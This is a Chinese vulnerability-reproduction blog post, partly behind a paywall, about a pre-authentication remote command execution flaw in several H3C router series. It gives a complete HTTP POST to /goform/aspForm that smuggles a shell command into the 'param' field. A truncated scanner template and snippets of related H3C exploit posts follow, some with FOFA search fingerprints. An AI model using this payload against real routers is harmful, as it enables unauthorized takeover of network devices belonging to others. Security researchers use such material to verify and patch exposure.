H3C多系列路由器存在前台RCE漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-05 14:51:46 修改

阅读量1.8k

点赞数 6

分类专栏：漏洞复现文章标签：网络 web安全

于 2024-04-05 14:51:36 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/137400698

版权

漏洞复现专栏收录该内容

363 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01漏洞描述

H3C多系列路由器存在前台RCE漏洞

0x02漏洞复现

（1）payload利用地址：/goform/aspForm

（2）命令执行POC：

POST /goform/aspForm HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76



CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/test);

0x03POC使用（Tscan验证）

params: []
name: H3C多系列路由器存在前台RCE漏洞
set:
a2: '"do_cmd.asp"'
a3: '"www"'
body: base64Decode(b'Q01EPURl

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

6
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

订阅专栏

H3C-IMC智能管理中心RCE漏洞复现

iSee857的博客

08-28

1064

Fofa：(title="用户自助服务" && body="/selfservice/javax.faces.resource/") || body="/selfservice/index.xhtml"autoDeploy接口中存在远程代码执行漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。该漏洞利用难度较低，建议受影响的用户尽快修复。厂商已更新补丁，请即时进行处理。

DOCBOX dynamiccontent.properties.xhtml RCE漏洞复现

0xSec

12-06

825

DOCBOX电子文档管理系统4.2.0版本中dynamiccontent.properties.xhtml接口存在远程代码执行漏洞，未经身份认证的攻击者可以获取服务器权限。

1 条评论您还未登录，请先登录后发表或查看评论

漏洞复现-H3C系列

aming小老弟

03-15

1404

H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台，旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具，帮助企业用户更高效地管理和维护其网络设备，并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞，未经身份验证的攻击者可以利用此漏洞执行任意指令，写入后门文件，导致整个web服务器存在被控的风险。

H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞

weixin_51387754的博客

11-29

1827

漏洞简介 H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞，攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令漏洞类似于齐治堡垒机漏洞复现 app=“H3C-SecPath-运维审计系统” 先通过任意用户登录获取Cookie /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(

关于H3C路由器漏洞的情况说明

weixin_44106034的博客

10-19

5112

ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器、H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。

远程重启h3c路由器_Oracle WebLogic远程代码执行漏洞（CVE20202546、CVE20202551）威胁通告...

weixin_39535217的博客

12-12

728

漏洞综述关于WebLogic ServerWebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。安全公告2020年1月15日，Oracle官方发布了2020年1月关键补丁更新，包含了家族多个产品的安全漏洞公告。其中有两个跟Oracle ...

H3C任意命令执行漏洞

热门推荐

战神/calmness的博客

05-23

1万+

H3C漏洞目录简述过程修复建议参考链接简述 H3C iMC智能管理中心云计算（cloud computing）：“云计算是一种计算模式，利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户（Gartner）”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的，并且可以随时获取，按需使用，随时扩展，这使得应用提供者无需为繁琐的细节而烦恼，能够更加专注于自己的业务，有利于创新和降低成本。过程 body="iMC来宾接入自助管理..

H3C SecParh堡垒机任意用户登录与远程执行代码漏洞

剁椒鱼头没剁椒的博客

02-02

3709

这里确实成功登录上去了，若设定三权的话，可能存在把admin用户设定为类似与这里的审计管理员，那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试，只是提供一个思路。我使用火狐浏览器，我访问后就自动将信息进行下载，不过也有浏览器直接跳转界面的也行，都能够看到。

记录开发和安全学习过程中的点点滴滴

04-22

3049

也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.

H3C路由器userLogin.asp信息泄漏漏洞-类型补充

weixin_45100060的博客

08-06

732

华三家用路由器配置泄露

（附nuclei yaml文件）H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)

nglj9527的博客

05-22

1341

漏洞位于/userLogin.asp页面，通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg，可获取设备配置文件，进而获得WEB管理账号及密码。

H3C ER8300G2-X.cfg信息泄露漏洞

最新发布

ZeroDay001的博客

11-14

392

H3C（新华三）是一家专注于数字化解决方案的科技公司，提供全方位的计算、存储、网络、安全等产品和服务，广泛应用于企业、政府、教育、医疗等行业。它致力于为客户提供数字化转型所需的综合解决方案，以提升业务效率并加速创新。

漏洞复现 || H3C iMC 存在远程命令执行

失心少年

07-07

1150

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！H3C Intelligent Management Center（以下简称 H3C iMC）是一款业务智能管理平台。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。

H3C ER G2系列路由器敏感信息泄露漏洞

故事讲予风听

09-20

2456

H3C ER2200G2是H3C推出的新一代高性能企业级路由器，采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场（SMB），可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口，利用该漏洞访问ER2200G2.cfg文件。

H3C智能管理中心byod/index.xhtml接口存在远程命令执行漏洞

nnn2188185的博客

08-09

299

H3C智能管理中心byod/index.xhtml接口存在远程命令执行漏洞

【漏洞复现】H3C 路由器多系列信息泄露漏洞

晚风不及你

02-19

3089

H3C路由器是一款高性能的路由器产品，具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制，可以满足不同用户的需求，广泛应用于企业、运营商和数据中心等领域。

h3c多系列路由器存在任意用户登录漏洞

m0_49025459的博客

08-28

4556

也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者无关。密码就在vtypasswd之后，账户一般都是admin。根据根据系统名修改payload。发送请求包，获取管理员账号密码。

【漏洞复现】H3C路由器信息泄露任意用户登录

失心少年

09-06

3655

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！1.利用GET发送如下请求包，获取管理员账号密码(ER3100 根据web界面的标题修改)通过访问特地址得到密码可进行登录。

H3C网络管理系统任意文件读取漏洞复现 [附POC]

薛定谔嘚喵博客

11-27

813

H3C 网络管理系统是面向GPON和XG(S)-PON设备开发的运维管理解决方案，为设备提供自动化配置下发和备份、可视化故障告警和诊断、远程设备升级等功能；管理系统支持B/S 架构，无需安装插件。H3C 网管系统存在任意文件读取漏洞，攻击者可利用该漏洞获取敏感信息。

Tscan20240321：全新自动化漏洞扫描工具发布

4. H3C_CVM_前台任意文件上传漏洞、H3Cflexfileupload任意文件上传漏洞和H3C多系列路由器存在前台RCE漏洞：这些漏洞涉及H3C品牌的多个产品，包括其云虚拟机管理平台和路由器系列，可能导致攻击者上传恶意文件并执行...